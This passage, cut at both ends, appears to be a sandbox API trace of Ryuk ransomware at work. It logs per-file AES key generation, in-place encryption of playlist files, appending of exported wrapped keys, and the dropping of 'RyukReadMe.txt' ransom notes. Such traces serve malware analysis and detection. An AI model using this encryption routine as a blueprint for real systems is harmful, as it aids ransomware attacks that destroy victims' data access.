lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.416] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x250, lpOverlapped=0x0) returned 1 [0142.416] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.416] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.416] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.417] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.417] CloseHandle (hObject=0x1a0) returned 1 [0142.433] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.438] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.438] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.438] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl", dwFileAttributes=0x80) returned 1 [0142.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.439] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1079) returned 1 [0142.439] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1079) returned 1 [0142.439] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x315, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.439] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.440] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.440] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.440] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.440] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.440] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x437, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x437, lpOverlapped=0x0) returned 1 [0142.440] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.440] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x437, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x440) returned 1 [0142.440] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.440] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x440, lpOverlapped=0x0) returned 1 [0142.440] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.441] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.441] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.441] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.441] CloseHandle (hObject=0x1a0) returned 1 [0142.457] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.461] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.461] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.461] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0142.461] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0142.462] SetLastError (dwErrCode=0x0) [0142.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.462] GetLastError () returned 0x0 [0142.462] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0142.463] CloseHandle (hObject=0x19c) returned 1 [0142.463] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.463] SetLastError (dwErrCode=0x0) [0142.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.463] GetLastError () returned 0xb7 [0142.463] CloseHandle (hObject=0x19c) returned 1 [0142.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0142.465] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.465] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.466] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.466] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1044) returned 1 [0142.466] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1044) returned 1 [0142.466] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.466] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.468] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.468] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.468] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.468] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.468] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x414, lpOverlapped=0x0) returned 1 [0142.468] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.468] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x414, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x420) returned 1 [0142.468] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.468] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x420, lpOverlapped=0x0) returned 1 [0142.468] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.468] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.468] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.468] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.468] CloseHandle (hObject=0x1a0) returned 1 [0142.485] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.489] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.489] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.489] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.489] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.490] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0142.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.491] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1279) returned 1 [0142.491] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1279) returned 1 [0142.491] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.491] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.492] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.492] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.492] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.492] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.492] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4ff, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x4ff, lpOverlapped=0x0) returned 1 [0142.492] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.493] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x4ff, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x500) returned 1 [0142.493] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.493] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x500, lpOverlapped=0x0) returned 1 [0142.493] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.493] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.493] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.493] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.493] CloseHandle (hObject=0x1a0) returned 1 [0142.519] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.523] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.523] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.524] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.524] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.524] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.524] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1267) returned 1 [0142.524] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1267) returned 1 [0142.524] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.524] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.526] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.526] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.526] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.526] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.526] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4f3, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x4f3, lpOverlapped=0x0) returned 1 [0142.526] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.526] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x4f3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x500) returned 1 [0142.526] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.526] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x500, lpOverlapped=0x0) returned 1 [0142.526] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.526] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.526] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.526] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.526] CloseHandle (hObject=0x1a0) returned 1 [0142.543] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.547] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.547] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.547] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl", dwFileAttributes=0x80) returned 1 [0142.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.548] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1284) returned 1 [0142.548] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1284) returned 1 [0142.548] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x3e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.548] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.550] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.550] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.550] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.550] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.550] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x504, lpOverlapped=0x0) returned 1 [0142.550] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.550] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x504, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x510) returned 1 [0142.550] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.550] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x510, lpOverlapped=0x0) returned 1 [0142.550] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, 